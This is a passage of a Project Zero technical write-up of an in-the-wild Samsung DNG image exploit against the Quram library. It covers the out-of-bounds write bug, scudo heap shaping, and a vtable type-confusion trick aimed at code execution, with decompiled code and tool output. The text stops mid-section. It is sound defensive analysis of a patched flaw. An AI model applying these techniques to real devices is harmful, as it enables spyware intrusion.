Visualização normal

Antes de ontemStream principal
  • ✇Project Zero
  • A look at an Android ITW DNG exploit Google Project Zero
     Posted by Benoît Sevens, Google Threat Intelligence GroupIntroductionBetween July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.Investigation of these images showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.On November 7, 2025 Unit 42 released a blogpost describing how these exploits were used
     

A look at an Android ITW DNG exploit

12 de Dezembro de 2025, 15:01

 Posted by Benoît Sevens, Google Threat Intelligence Group

Introduction

Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.


Investigation of these images showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.


On November 7, 2025 Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we would like to focus on the technical details about how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.


There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received less public documentation, but we would definitely not argue it is because of their lack of existence. Therefore we believe it is an interesting case study to publicly document the technical details of such an exploit on Android.

Attack vector

The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:


IMG-20240723-WA0000.jpg

IMG-20240723-WA0001.jpg

IMG-20250120-WA0005.jpg

WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg


The first filenames listed follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.


The first two images were received on the same day, based on the filename, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit as this allocator is more hardened and relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.


The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?


The com.samsung.ipservice process is a Samsung-specific system service responsible for providing "intelligent" or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.


When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.


However, WhatsApp does not intend to automatically download images from untrusted contacts. (WhatsApp on Android’s logic is a bit more nuanced though. More details can be found in Brendon Tiszka’s report of a different issue). This means that without additional bypasses and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore. This would mean this is in fact a “1-click” exploit. We don’t have any knowledge or evidence of the attacker using such a bypass though.

A curious image

Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.


$ file "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg" 

WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg: TIFF image data, little-endian, direntries=24, width=1, height=1, bps=8, compression=none, PhotometricInterpretation=BlackIsZero, description={"shape": [1, 1, 1]}, manufacturer=Canon, model=Canon EOS 350D DIGITAL, orientation=upper-left

$ exiftool "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"

...

File Type                       : DNG

File Type Extension             : dng

MIME Type                       : image/x-adobe-dng

...

Image Width                     : 16

Image Height                    : 16

Bits Per Sample                 : 8

Compression                     : Uncompressed

Photometric Interpretation      : Color Filter Array

Image Description               : {"shape": [16, 16]}

Samples Per Pixel               : 1

X Resolution                    : 1

Y Resolution                    : 1

Resolution Unit                 : None

Tile Width                      : 16

Tile Length                     : 16

Tile Offsets                    : 6596538

Tile Byte Counts                : 256

CFA Repeat Pattern Dim          : 2 2

CFA Pattern 2                   : 0 1 1 2

CFA Plane Color                 : Red,Green,Blue

CFA Layout                      : Rectangular

Active Area                     : 0 0 10 10

Opcode List 1                   : [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...

Opcode List 2                   : [opcode 23], [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...

Opcode List 3                   : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...

Subfile Type                    : Full-resolution image

Strip Offsets                   : 6596794

Strip Byte Counts               : 1

...


(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)


Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:


Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe.

DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.


The image width and height look suspiciously small. And what are these opcode lists?

Some DNG format basics

The DNG format specification can be found on Adobe’s website.


DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:


  • Type “Preview Image” with width 1 and length 1

  • Type “Main Image” with width 16 and length 16

  • Type “Main Image” with width 1 and length 1


As we mentioned already briefly, the sizes of these images are obviously very suspicious, as well as the fact that there are 2 “Main Image” types. We have not figured out what the purpose of the second main image is (if any).


DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” will be very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader. Their intended use case is for example to perform lens corrections. The reason there are 3 opcode lists is because they are intended to be applied at different moments during the DNG decoding:


  1. The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image

  • Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image

  • The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.

    • Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image 

  • The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.

    • Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.


    Every opcode has an opcode ID and varying number and type of parameters. The latest specification (1.7.1.0 from September 2023), contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of opcode description found in the specification:



    For this exploit, only 3 opcodes will be of interest: 

    • TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle. 

    • MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.

    • DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image. 


    DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter). 


    Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:


    • They use opcodes with opcode ID 23 (which exiftool can not map to an opcode name).

    • Typical benign DNG images will contain only a handful of opcodes, while for this image we have thousands of opcodes in the opcode lists.

    Quram

    As we mentioned before, the targeted process based on the payload is the Samsung firmware specific com.samsung.ipservice. The next question then becomes what code in this application performs the DNG decoding.


    Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of "jpg", "jpeg", "JPG" or "JPEG", it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).


    public class com.quramsoft.images.QrBitmapFactory {


       public static Bitmap decodeFile(String str, Options options) {

            Bitmap decodeFile = QuramBitmapFactory.decodeFile(str, options); // [1]; calls into Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2

                                                                             // Fails

            if ((options.inJustDecodeBounds && (options.outWidth > 0 || options.outHeight > 0)) || decodeFile != null) {

                return decodeFile;

            }

            try {

                Bitmap decodeFile2 = QuramDngBitmap.decodeFile(str, options); // [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI

                if (options.outWidth <= 0) {

                    if (options.outHeight <= 0) {

                        return decodeFile2;

                    }

                }

                options.outMimeType = "image/dng";

                return decodeFile2;

            } catch (IOException e2) {

                e2.printStackTrace();

                return null;

            }

        }


    The "Quram library" is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.


    The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.


    When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function will perform the complete DNG decoding and it is within this code path the vulnerability is triggered and the exploit fully executes.


    The call sequence is summarized below:


    com.quramsoft.images.QrBitmapFactory.decodeFile (com.samsung.ipservice.apk)

    |_ com.quramsoft.images.QuramBitmapFactory.decodeFile (com.samsung.ipservice.apk)

    |  |_  Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 (/system/lib64/libimagecodec.quram.so) // Fails

    |

    |_ com.quramsoft.images.QuramDngBitmap.decodeFile (com.samsung.ipservice.apk)

       |_ Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI (/system/lib64/libimagecodec.quram.so) // Triggers bug


    Analysis setup

    A few tools came in handy when analysing this exploit, which we’ll describe next.


    First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.


    ...

    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Parsing OpcodeList3: 5347 opcodes


    Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

    Bounds: t=0, l=0, b=1, r=1


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5125:5123, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5127:5125, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5157:5155, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000

    ...



    On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.


    It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit. 


    Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.

    The bug

    Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:


    $ grep Opcode dng_validate.out  | uniq -c

          1 OpcodeList1: count = 320004, offset = 814

          1 OpcodeList2: count = 3844, offset = 320818

          1 OpcodeList3: count = 6271556, offset = 324662

          1 Parsing OpcodeList1: 20000 opcodes

      20000 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList2: 240 opcodes

        240 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList3: 5347 opcodes

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

        480 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        400 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         48 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        216 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         24 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

         15 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

        240 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         48 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        216 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         12 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          6 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

       2438 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

       1040 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

          1 Opcode: ScalePerColumn, minVersion = 1.4.0.0, flags = 1


    The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).


    Let’s look at the first 2 known opcodes, which occur in opcode list 3:


    $ grep -A8 TrimBounds dng_validate.out  | head -n 8

    Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

    Bounds: t=0, l=0, b=1, r=1


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5125:5123, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000



    The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the "Area Spec" to work over: top, left, right, bottom coordinates, the plane and total number of planes being targeted, and the length of each row and column (rowPitch and colPitch). These values are controllable by the attacker.


    The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 in the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. The first value (5125) is the first plane to apply the DeltaPerColumn to, while the second value (5123) is the number of planes. Since the planes are numbered 0 to 2, these values are clearly out of bounds.


    Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the relevant lines of that function for the vulnerability. (Variable names are chosen by us since this is a closed source library)



    __int64 __fastcall QuramDngOpcodeDeltaPerColumn::processArea(

            QuramDngOpcode *opcode,

            QuramDngDecoder *decoder,

            QuramDngImage *image,

            QuramDngRect *rect)

    {

    ...

        image_buffer = image->buffer;

    ...

                    image_number_of_planes = image_buffer->planes;  // 3

                    opcode_first_plane = opcode->plane;  // 5125

    ....

                    opcode_number_of_planes = opcode->planes;  // 5123

                    opcode_last_plane = image_number_of_planes + opcode_number_of_planes;  // 3 + 5123 = 5126

    ...

                        if (opcode_first_plane < opcode_last_plane )  // 5125 < 5126

                        {

    ...

                                current_plane = opcode_first_plane;  // 5125

    ...

                                    do

                                    {

    ...                                 // Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`, i.e. 5125!

                                        current_plane++;

                                    }

                                    while ( current_plane != opcode_last_plane );  // 5125 != 5126

    ...

    }


    The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.


    Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.


    There are two issues in that handler function:

    • opcode_last_plane is calculated incorrectly. It should be opcode_first_plane + opcode_number_of_planes (as will be the case in the patched version). This by itself is a correctness issue (and a pretty basic one that would be expected to surface by normal usage or testing of the library).

    • The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane is within the number of planes that the image contains.


    The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will be executed exactly once. The width and length loop will also be executed only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has a width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.


    Not only the offset of the write is controlled, the value to be added to the current value in the raw pixel buffer is also fully controlled, since it is an opcode parameter. In this case it is 26214.0 (or 0x6666). This vulnerability gives thus a very strong primitive from the start: the attacker can add chosen values at chosen offsets with respect to the raw pixel buffer.


    Now why do we need that TrimBounds opcode before triggering the bug? That will become clear when we discuss the heap shaping strategy. 

    Exploit flow

    Heap shaping strategy

    Since the buffers containing the pixel values are dynamically allocated on the heap, it is important to understand what heap allocations the Quram library makes and how these allocations behave to understand the heap layout at the time of the vulnerability triggering.


    As we mentioned earlier, exploits exist for Android versions using both jemalloc and scudo allocator. We will analyse the exploit targeting the scudo allocator, since this is the common allocator on modern Android versions. The same techniques were used in a different way in the jemalloc exploit.

    Scudo

    We will not give a detailed overview of Android’s scudo allocator, which is being used here for the allocations, since excellent documentation by Synacktiv already exists, to which we refer. We will only mention the elements that are important for this exploit.


    Scudo allocates objects in different heap regions depending on the allocation size. For two objects of different types to land near each other, they need to belong to the same size class. The size required from the allocator’s point of view for a “block” is composed of:

    • A header of 0x10 bytes

    • The chunk with the user requested size. A pointer to the chunk is returned to the caller.


    New allocations are retrieved via “transfer batches”. The number of allocations in a transfer batch depends on the size class. For the size we will be interested in (chunks of 0x30 bytes, i.e. blocks of 0x40 bytes), there are 52 allocations in a transfer batch. The allocations within a transfer batch are returned in a randomized order, however subsequent transfer batches are just laid out linearly in memory. A consequence of this is that given enough allocations between two allocations of the same size, an attacker can be confident that the last allocation falls after the first allocation.


    Lastly, scudo supports a quarantine mechanism that prevents freed allocations to be returned immediately on a next allocation request. However on Android this quarantine mechanism is disabled. The consequence is that a freed object will be directly reallocated on the next allocation request of the same size.

    Quram’s heap allocations

    With a basic understanding of scudo’s allocation behaviour, let’s look at the specific heap allocations Quram makes when decoding a DNG file.


    First, when Quram parses the opcode lists in the DNG file, it will allocate one QuramDngOpcode object per opcode. These objects contain the parameters of the opcode, as well as a vtable pointer to the handlers for that opcode. The size of such an object depends thus on the number and type of parameters and hence on the type of opcode. The size of the different opcodes can be looked up in QuramDngDecoder::makeDngOpcode. For the exploit at hand, only the following opcode sizes are relevant:

    • DeltaPerColumn (opcode ID 11): 0x50 bytes
    • MapTable (opcode ID 7): 0x50 bytes
    • TrimBounds (opcode ID 6): 0x30 bytes
    • Unknown (starting at opcode ID 14, such as opcode ID 23 in the exploit): 0x30 bytes


    This means TrimBounds and Unknown opcodes will land in the same heap region, distinct from the heap region containing the DeltaPerColumn and MapTable opcodes.


    Next, for every stage image, Quram will allocate three heap buffers:

    • A QuramDngImage of fixed size 0x30, which describes the image

    • A buffer for the pixel values of variable size (depending on width, height and number of planes)

    • A QuramDngPixelBuffer of fixed size 0x40, which describes the contents of the buffer


    These different objects and their relationship are illustrated below:



    There are two “pixel buffers” at play here, which can be a bit confusing: the QuramDngPixelBuffer object and the raw buffer with pixel values. In what comes, when we talk about “raw pixel buffer”, we refer to the latter.


    QuramDngImage and QuramDngPixelBuffer will land in different heap regions since they belong to different scudo allocation class sizes. The raw pixel buffer may end up in the same heap region as a QuramDngImage depending on its size. Its size is calculated by ComputeBufferSize. For the dimensions of the stage 3 image of the exploit (width 1 by length 1 with 3 color planes) it will calculate a size of 0x30 bytes (even though 6 bytes would suffice). For the stage 1 and stage 2 images, the sizes are different and will be allocated in a different heap region.


    To conclude, both the TrimBounds opcodes, the Unknown opcodes, the QuramDngImage objects as well as potentially the raw pixel buffer will end up in the same heap region.

    Final heap layout

    We can now study the sequence of events during DNG decoding to understand the heap layout at the time of the vulnerability trigger:


    • QuramDngDecoder::getRegionStage1Image will allocate a “stage 1” QuramDngImage (size 0x30)

    • QuramDngDecoder::readStage1Image parses the 3 opcode lists and allocates a QuramDngOpcode structure per opcode. As we saw, only TrimBounds and Unknown opcodes will land in the same heap region of 0x30 bytes chunks, which is of interest to us. Other opcodes are allocated in different heap regions.



    $ grep -E 'OpcodeList|TrimBounds|Unknown' dng_validate.out  | uniq -c

          1 OpcodeList1: count = 320004, offset = 814

          1 OpcodeList2: count = 3844, offset = 320818

          1 OpcodeList3: count = 6271556, offset = 324662

          1 Parsing OpcodeList1: 20000 opcodes

      20000 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList2: 240 opcodes

        240 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList3: 5347 opcodes

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

        640 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

       1040 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1


    • QuramDngDecoder::buildStage2Image will apply opcode list 1. When it is done, the 20000 unknown opcodes it contains are freed.

    • QuramDngDecoder::doBuildStage2 will allocate a QuramDngImage “stage 2” (size 0x30) and convert stage 1 to stage 2. This stage 2 image will take the spot of the last opcode of opcode list 1 that was freed.

    • QuramDngDecoder::buildStage2Image can now free the “stage 1” QuramDngImage. It will then process the opcode list 2, and free the 240 “unknown” opcodes.

    • QuramDngDecoder::doInterpolateStage3 will allocate both a new “stage 3” QuramDngImage (size 0x30) and subsequently a raw pixel buffer of size 0x30. These will take the spots of the last 2 opcodes freed from opcode list 2 in the previous step.

    • QuramDngDecoder::buildStage3Image can now free the “stage 2” QuramDngImage.

    • Opcode list 3 gets processed now. In the first TrimBounds opcode, QuramDngOpcodeTrimBounds::doApply will allocate a new raw pixel buffer of size 0x30 (although the replaced raw pixel buffer has the exact same size). This allocation will take the spot of the freed stage 2 image.

      • Note that the 640 other TrimBounds opcodes have a “minVersion” of 1.4.0.1. This is a trick that will make QuramDngOpcode::aboutToApply bail out early and not have the TrimBounds actually executed. The goal of spraying these 640 TrimBounds opcodes will become clear later.


    The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.





    Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.


    Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which will help us in quickly inferring what parts of an object are being corrupted. The illustration also depicts the sizes the allocations occupy in total, which will be important for understanding the subsequent exploitation flow.


    As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it assures that the raw pixel buffer will end up before the QuramDngImage. Without it, there would be a one out of two chance that the raw pixel buffer takes a spot after the QuramDngImage.

    The initial corruption

    After achieving the right heap layout using the TrimBounds, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values to arbitrary offsets out of bounds. The attackers add 0x6666 to offsets 10 and 12 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.


    Looking at our heap layout, we will corrupt three types of objects at these offsets:


    • Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).


    Before:

    0xb400007e3e3fa050:     0x0000007fee5a3fb0      0x0104000000000017

    0xb400007e3e3fa060:     0x0000000100000001      0x0000000000000002

    0xb400007e3e3fa070:     0x0000000000000000      0x0000000000000000

    After:

    0xb400007e3e3fa050:     0x0000007fee5a3fb0      0x676a000066660017

    0xb400007e3e3fa060:     0x0000000100000001      0x0000000000000002

    0xb400007e3e3fa070:     0x0000000000000000      0x0000000000000000


    • Most importantly, it will encounter the QuramDngImage object. The two corrupted fields of this object are the “bottom” and “right” fields of the image, which are used in other opcode handlers for verifying if operations are within bounds. This means that we can now use other opcodes, such as MapTable, to perform actions out of bounds.


    Before:

    0xb400007e3e3fb810:     0x0000000000000000      0x0000000100000001

    0xb400007e3e3fb820:     0x0000000300000003      0xb400007f1e2d7ad0

    0xb400007e3e3fb830:     0xb400007e3e3f7850      0x0000000000000030

    After:

    0xb400007e3e3fb810:     0x0000000000000000      0x6666000166660001

    0xb400007e3e3fb820:     0x0000000300000003      0xb400007f1e2d7ad0

    0xb400007e3e3fb830:     0xb400007e3e3f7850      0x0000000000000030


    If we look for example at the first MapTable that follows, it looks like:


    Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=5120, b=1, r=5121, p=0:1, rp=1, cp=1

    Count: 65536


    Under regular circumstances, the “left” and “right” value would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage though, this opcode will operate out of bounds.

    Extending the primitives

    Incrementing arbitrary out of bound values with chosen values is a powerful primitive, but the exploit will also want to write absolute arbitrary values out of bounds. The former can be converted pretty easily into the latter though.


    If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.


    Zeroing memory can be done in two ways, and both are used in the exploit:


    • Using the MapTable opcode with a substitution table of all zeros

    • Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.


    In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).

    Crafting a bogus MapTable opcode

    With linear out-of-bounds write primitive in place, the exploit could now:

    • Write a shell command somewhere out of bounds

    • Write a JOP gadget chain somewhere out of bounds which ends up calling system()

    • Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution


    There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.


    Let’s show the first MapTable opcode again:



    Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=5120, b=1, r=5121, p=0:1, rp=1, cp=1

    Count: 65536



    This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.





    It is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values are mapped to itself, however a few are not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated).


    For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.


    Their substitution table supports different versions of the library, which works because there are not that many versions of the library (the exploit supports 7 versions) and the lower bytes of the vtable do not collide. Moreover, since ASLR is applied at page level granularity, they need to account for every page multiple the vtable can be mapped at. Say we have the following vtable offsets:




    libimagecodec.quram.so version x

    libimagecodec.quram.so version y

    QuramDngOpcodeTrimBounds vtable offset

    0x2dccf0

    0x2dce10

    QuramDngOpcodeMapTable vtable offset

    0x2dcd30

    0x2dce50

    Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):


    index  : value

    0x0cf0 : 0x0d30

    0x0e10 : 0x0e50

    0x1cf0 : 0x1d30

    0x1e10 : 0x1e50

    0x2cf0 : 0x2d30

    0x2e10 : 0x2e50

    0x3cf0 : 0x3d30

    0x3e10 : 0x3e50

    0x4cf0 : 0x4d30

    0x4e10 : 0x4e50

    0x5cf0 : 0x5d30

    0x5e10 : 0x5e50

    0x6cf0 : 0x6d30

    0x6e10 : 0x6e50

    0x7cf0 : 0x7d30

    0x7e10 : 0x7e50

    0x8cf0 : 0x8d30

    0x8e10 : 0x8e50

    0x9cf0 : 0x9d30

    0x9e10 : 0x9e50

    0xacf0 : 0xad30

    0xae10 : 0xae50

    0xbcf0 : 0xbd30

    0xbe10 : 0xbe50

    0xccf0 : 0xcd30

    0xce10 : 0xce50

    0xdcf0 : 0xdd30

    0xde10 : 0xde50

    0xecf0 : 0xed30

    0xee10 : 0xee50

    0xfcf0 : 0xfd30

    0xfe10 : 0xfe50



    Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.


    The constructed bogus MapTable opcode object looks like this:



    Before:

